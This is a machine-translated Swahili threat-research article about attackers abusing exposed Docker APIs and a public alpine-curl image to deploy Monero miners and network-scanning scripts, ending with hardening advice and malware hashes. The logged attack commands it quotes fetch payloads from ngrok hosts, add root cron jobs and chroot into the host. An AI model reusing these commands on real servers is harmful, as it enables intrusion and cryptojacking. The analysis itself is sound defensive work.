Tulichanganua data iliyokusanywa kwa kutumia vyombo vya asali, tuliyounda ili kufuatilia vitisho. Na tuligundua shughuli muhimu kutoka kwa wachimbaji fedha za crypto zisizotakikana au zisizoidhinishwa zilizowekwa kama vyombo chafu kwa kutumia picha iliyochapishwa na jumuiya kwenye Docker Hub. Picha hiyo inatumika kama sehemu ya huduma inayowaletea wachimbaji madini hasidi.
Zaidi ya hayo, mipango ya kufanya kazi na mitandao imewekwa ili kupenya vyombo na programu za jirani zilizo wazi.
Tunaacha vyungu vyetu vya asali kama vile, yaani, na mipangilio chaguo-msingi, bila hatua zozote za usalama au usakinishaji wa programu za ziada. Tafadhali kumbuka kuwa Docker ina mapendekezo ya usanidi wa awali ili kuzuia makosa na udhaifu rahisi. Lakini sufuria za asali zinazotumiwa ni vyombo, vilivyoundwa kutambua mashambulizi yanayolenga jukwaa la uwekaji wa vyombo, sio programu zilizo ndani ya vyombo.
Shughuli hasidi iliyotambuliwa pia inajulikana kwa sababu haihitaji udhaifu na pia haitegemei toleo la Docker. Kupata picha iliyosanidiwa vibaya, na kwa hivyo kufunguliwa, picha ya kontena ndiyo tu washambuliaji wanahitaji kuambukiza seva nyingi zilizo wazi.
API ya Docker ambayo haijafungwa inaruhusu mtumiaji kutekeleza anuwai ya , ikiwa ni pamoja na kupata orodha ya vyombo vinavyoendesha, kupata magogo kutoka kwenye chombo maalum, kuanzia, kuacha (ikiwa ni pamoja na kulazimishwa) na hata kuunda chombo kipya kutoka kwa picha maalum na mipangilio maalum.
Upande wa kushoto ni njia ya uwasilishaji programu hasidi. Upande wa kulia ni mazingira ya mshambulizi, ambayo inaruhusu utoaji wa mbali wa picha.
Usambazaji kwa nchi za API 3762 zilizofunguliwa za Docker. Kulingana na utafutaji wa Shodan wa tarehe 12.02.2019/XNUMX/XNUMX
Chaguzi za mlolongo wa mashambulizi na upakiaji
Shughuli mbaya iligunduliwa sio tu kwa msaada wa asali. Data kutoka kwa Shodan inaonyesha kwamba idadi ya API za Docker zilizofichuliwa (angalia jedwali la pili) imeongezeka tangu tulipochunguza kontena lililowekwa vibaya lililotumiwa kama daraja la kupeleka programu ya madini ya Monero ya sarafu ya fiche. Mnamo Oktoba mwaka jana (2018, data ya sasa takriban. mfasiri) kulikuwa na API 856 tu zilizofunguliwa.
Uchunguzi wa magogo ya chungu cha asali ulionyesha kuwa matumizi ya picha ya chombo pia yalihusishwa na matumizi ya , zana ya kuanzisha miunganisho salama au kusambaza trafiki kutoka sehemu zinazoweza kufikiwa na umma hadi kwa anwani au nyenzo maalum (kwa mfano mwenyeji wa ndani). Hii inaruhusu wavamizi kuunda URL kwa nguvu wakati wa kuwasilisha mzigo wa malipo kwenye seva iliyo wazi. Ifuatayo ni mifano ya nambari kutoka kwa kumbukumbu zinazoonyesha matumizi mabaya ya huduma ya ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Kama unavyoona, faili zilizopakiwa hupakuliwa kutoka kwa URL zinazobadilika kila wakati. URL hizi zina tarehe fupi ya mwisho wa matumizi, kwa hivyo mizigo ya malipo haiwezi kupakuliwa baada ya tarehe ya mwisho wa matumizi.
Kuna chaguzi mbili za upakiaji. Ya kwanza ni mchimbaji ELF iliyokusanywa kwa ajili ya Linux (inayofafanuliwa kama Coinminer.SH.MALXMR.ATNO) ambayo inaunganishwa na bwawa la uchimbaji madini. Ya pili ni hati (TrojanSpy.SH.ZNETMAP.A) iliyoundwa kupata zana fulani za mtandao zinazotumiwa kuchanganua safu za mtandao na kisha kutafuta shabaha mpya.
Hati ya kushuka huweka vigeu viwili, ambavyo hutumika kupeleka mchimbaji madini ya cryptocurrency. Tofauti ya HOST ina URL ambapo faili hasidi ziko, na utofauti wa RIP ni jina la faili (kwa kweli, heshi) ya mchimbaji wa madini itakayotumwa. Tofauti ya HOST inabadilika kila wakati mabadiliko ya heshi. Hati hiyo pia inajaribu kuangalia kuwa hakuna wachimbaji wengine wa sarafu ya crypto wanaoendesha kwenye seva iliyoshambuliwa.
Mifano ya vigezo vya HOST na RIP, pamoja na kijisehemu cha msimbo kinachotumika kuangalia kuwa hakuna wachimbaji wengine wanaoendesha.
Kabla ya kuanza mchimbaji, inaitwa jina nginx. Matoleo mengine ya hati hii hubadilisha jina la mchimbaji kuwa huduma zingine halali ambazo zinaweza kuwa katika mazingira ya Linux. Kawaida hii inatosha kupitisha ukaguzi dhidi ya orodha ya michakato inayoendesha.
Hati ya utafutaji pia ina vipengele. Inafanya kazi na huduma sawa ya URL kupeleka zana zinazohitajika. Miongoni mwao ni binary ya zmap, ambayo hutumiwa kuchambua mitandao na kupata orodha ya bandari zilizo wazi. Hati pia hupakia binary nyingine ambayo hutumiwa kuingiliana na huduma zilizopatikana na kupokea mabango kutoka kwao ili kuamua maelezo ya ziada kuhusu huduma iliyopatikana (kwa mfano, toleo lake).
Hati pia huamua mapema baadhi ya masafa ya mtandao ili kuchanganua, lakini hii inategemea toleo la hati. Pia huweka bandari zinazolengwa kutoka kwa huduma - katika kesi hii, Docker - kabla ya kuendesha skanisho.
Mara tu malengo yanapopatikana, mabango huondolewa kiotomatiki kutoka kwao. Hati pia huchuja shabaha kulingana na huduma, programu, vijenzi au majukwaa ya kuvutia: Redis, Jenkins, Drupal, MODX, , mteja wa Docker 1.16 na Apache CouchDB. Ikiwa seva iliyochanganuliwa inalingana na yoyote kati yao, itahifadhiwa katika faili ya maandishi, ambayo washambuliaji wanaweza kutumia baadaye kwa uchambuzi na udukuzi unaofuata. Faili hizi za maandishi hupakiwa kwenye seva za washambuliaji kupitia viungo vinavyobadilika. Hiyo ni, URL tofauti hutumiwa kwa kila faili, ambayo ina maana kwamba upatikanaji wa baadae ni vigumu.
Vekta ya shambulio ni picha ya Docker, kama inavyoweza kuonekana katika vipande viwili vifuatavyo vya msimbo.
Hapo juu ni kubadilisha jina kwa huduma halali, na chini ni jinsi zmap inatumiwa kuchanganua mitandao.
Hapo juu kuna safu za mtandao zilizofafanuliwa, chini kuna bandari maalum za kutafuta huduma, pamoja na Docker
Picha ya skrini inaonyesha kuwa picha ya alpine-curl imepakuliwa zaidi ya mara milioni 10
Kulingana na Alpine Linux na curl, zana ya CLI yenye ufanisi wa rasilimali ya kuhamisha faili juu ya itifaki mbalimbali, unaweza kuunda . Kama unavyoona kwenye picha iliyotangulia, picha hii tayari imepakuliwa zaidi ya mara milioni 10. Idadi kubwa ya vipakuliwa inaweza kumaanisha kutumia picha hii kama mahali pa kuingilia; picha hii ilisasishwa zaidi ya miezi sita iliyopita; watumiaji hawakupakua picha zingine kutoka kwa hazina hii mara nyingi. Katika Docker - seti ya maagizo yaliyotumiwa kusanidi chombo ili kuiendesha. Ikiwa mipangilio ya mahali pa kuingilia si sahihi (kwa mfano, chombo kimeachwa wazi kutoka kwa Mtandao), picha inaweza kutumika kama vekta ya mashambulizi. Wavamizi wanaweza kuitumia kuwasilisha mzigo wakipata kontena iliyosanidiwa vibaya au iliyofunguliwa ikiwa haijatumika.
Ni muhimu kutambua kwamba picha hii (alpine-curl) yenyewe sio mbaya, lakini kama unaweza kuona hapo juu, inaweza kutumika kufanya kazi mbaya. Picha zinazofanana za Docker pia zinaweza kutumika kufanya shughuli mbaya. Tuliwasiliana na Docker na tukafanya kazi nao kwenye suala hili.
Mapendekezo
bado kwa makampuni mengi, hasa yale yanayotekeleza , ililenga maendeleo ya haraka na utoaji. Kila kitu kinachochewa na hitaji la kuzingatia sheria za ukaguzi na ufuatiliaji, hitaji la kufuatilia usiri wa data, pamoja na uharibifu mkubwa kutoka kwa kutofuata kwao. Kujumuisha uwekaji otomatiki wa usalama katika mzunguko wa maisha ya usanidi hakukusaidia tu kupata mashimo ya usalama ambayo yanaweza yasigunduliwe, lakini pia hukusaidia kupunguza mzigo wa kazi usio wa lazima, kama vile kuendesha miundo ya ziada ya programu kwa kila udhaifu unaogunduliwa au usanidi mbaya baada ya programu kutumwa.
Tukio lililojadiliwa katika nakala hii linaonyesha hitaji la kuzingatia usalama tangu mwanzo, kutia ndani mapendekezo yafuatayo:
- Kwa wasimamizi wa mfumo na wasanidi: Angalia mipangilio yako ya API kila wakati ili kuhakikisha kuwa kila kitu kimesanidiwa ili kukubali maombi kutoka kwa seva maalum au mtandao wa ndani pekee.
- Fuata kanuni ya haki chache zaidi: hakikisha kuwa picha za kontena zimetiwa saini na kuthibitishwa, punguza ufikiaji wa vipengee muhimu (huduma ya uzinduzi wa kontena) na uongeze usimbaji fiche kwenye miunganisho ya mtandao.
- Fuata na kuwezesha mifumo ya usalama, k.m. na kujengwa ndani .
- Tumia uchanganuzi wa kiotomatiki wa nyakati na picha ili kupata maelezo ya ziada kuhusu michakato inayoendeshwa kwenye kontena (kwa mfano, kugundua udukuzi au kutafuta udhaifu). Udhibiti wa programu na ufuatiliaji wa uadilifu husaidia kufuatilia mabadiliko yasiyo ya kawaida kwenye seva, faili na maeneo ya mfumo.
Trendmicro husaidia timu za DevOps kujenga kwa usalama, kusambaza haraka na kuzinduliwa popote. Trend Micro Hutoa usalama thabiti, ulioratibiwa na otomatiki kwenye bomba la shirika la DevOps na hutoa ulinzi wa vitisho vingi. ili kulinda mizigo ya kimwili, ya mtandaoni na ya wingu wakati wa utekelezaji. Pia huongeza usalama wa chombo na и , ambayo huchanganua picha za kontena za Docker kwa programu hasidi na udhaifu katika hatua yoyote ya usanidi ili kuzuia vitisho kabla hazijatumwa.
Dalili za maelewano
Hashi zinazohusiana:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Cha Wasemaji wanaofanya mazoezi huonyesha mipangilio gani inapaswa kufanywa kwanza ili kupunguza uwezekano au kuepuka kabisa tukio la hali iliyoelezwa hapo juu. Na mnamo Agosti 19-21 kwenye mtandao mkubwa Unaweza kujadili shida hizi na sawa za usalama na wenzako na waalimu wanaofanya mazoezi kwenye meza ya pande zote, ambapo kila mtu anaweza kuzungumza na kusikiliza machungu na mafanikio ya wenzako wenye uzoefu.
Chanzo: mapenzi.com